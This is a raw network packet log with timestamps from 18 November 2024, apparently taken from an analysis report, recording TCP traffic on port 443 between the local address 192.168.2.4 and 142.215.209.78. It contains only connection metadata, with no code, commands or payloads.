                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463248968 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463279009 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463288069 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463331938 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463481903 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463541985 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463548899 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463983059 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464020967 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464042902 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464057922 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464106083 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464713097 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464781046 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464786053 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464818001 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464857101 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464876890 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464880943 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.464935064 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465538025 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465612888 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465626001 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465646029 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465686083 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465713024 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465722084 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465727091 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465774059 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465790987 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.465845108 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.466408014 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.466532946 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.466538906 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.466645002 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.466800928 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.466809988 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467108011 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467175961 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467180014 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467375994 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467447042 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467452049 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467492104 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467601061 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.467607021 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468005896 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468050957 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468091965 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468099117 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468188047 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468911886 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468960047 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468982935 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.468996048 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469038010 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469047070 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469131947 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469137907 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469798088 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469882965 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469949007 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469964027 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469964027 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.469978094 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470022917 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470052004 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470740080 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470782995 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470824957 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470829010 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470869064 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470910072 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470910072 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470917940 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.470935106 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471054077 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471695900 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471752882 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471766949 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471772909 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471807957 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471862078 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471862078 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471873045 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.471929073 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.472644091 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.472682953 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.472708941 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.472726107 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.472779036 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.472779036 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.582483053 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.582700014 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.582710981 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583158016 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583250046 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583266020 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583340883 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583405018 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583410025 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583538055 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583616972 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.583623886 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584029913 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584083080 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584093094 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584110022 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584148884 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584153891 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584223986 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584229946 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584522963 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584604025 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584609032 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584656954 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584726095 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584741116 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584748030 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584788084 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584803104 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584808111 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.584860086 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.585602999 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.585681915 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.585697889 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.585704088 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.585741043 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.585763931 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.585814953 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.585819960 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.586328030 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.586394072 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.586425066 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.586429119 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.586482048 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.586503983 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.586590052 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.586595058 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587213039 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587289095 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587305069 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587308884 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587358952 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587421894 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587421894 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587428093 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587439060 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587497950 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587503910 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.587558985 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588027954 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588098049 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588120937 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588124990 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588155031 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588181019 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588181019 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588187933 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588217020 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588262081 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588656902 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588741064 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588754892 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588864088 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588927031 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588973045 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588987112 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588987112 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.588992119 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589097023 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589097023 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589103937 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589844942 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589931011 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589978933 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589993000 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589993000 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.589998007 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590043068 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590054035 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590060949 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590115070 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590120077 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590646982 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590696096 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590708971 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590713978 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590831041 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590864897 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590893984 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590905905 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590912104 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590966940 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.590974092 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.591061115 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.591624975 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.591681957 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.591706991 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.591711044 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.591773987 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.591773987 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592226982 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592283964 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592298985 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592307091 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592377901 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592382908 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592830896 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592911959 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592916012 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592952967 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.592998028 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.593003035 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.593019009 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.593077898 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.593081951 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.594098091 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.594160080 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.594173908 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.594177961 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.594223976 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.594233990 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.594243050 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.594362020 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595304012 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595356941 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595372915 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595383883 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595449924 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595459938 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595500946 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595529079 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595531940 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.595601082 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596339941 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596429110 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596434116 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596764088 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596823931 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596839905 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596847057 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596899033 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596926928 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596963882 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.596968889 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.597978115 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598038912 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598048925 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598056078 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598095894 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598104000 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598192930 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598200083 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598536968 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598587036 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598596096 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.598997116 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599054098 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599059105 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599076033 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599133015 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599149942 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599179983 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599236012 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599256039 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599260092 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599337101 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599740028 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599788904 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599802017 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599807978 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599844933 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599848986 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599877119 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599895000 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.599899054 CET44349731142.215.209.78192.168.2.4
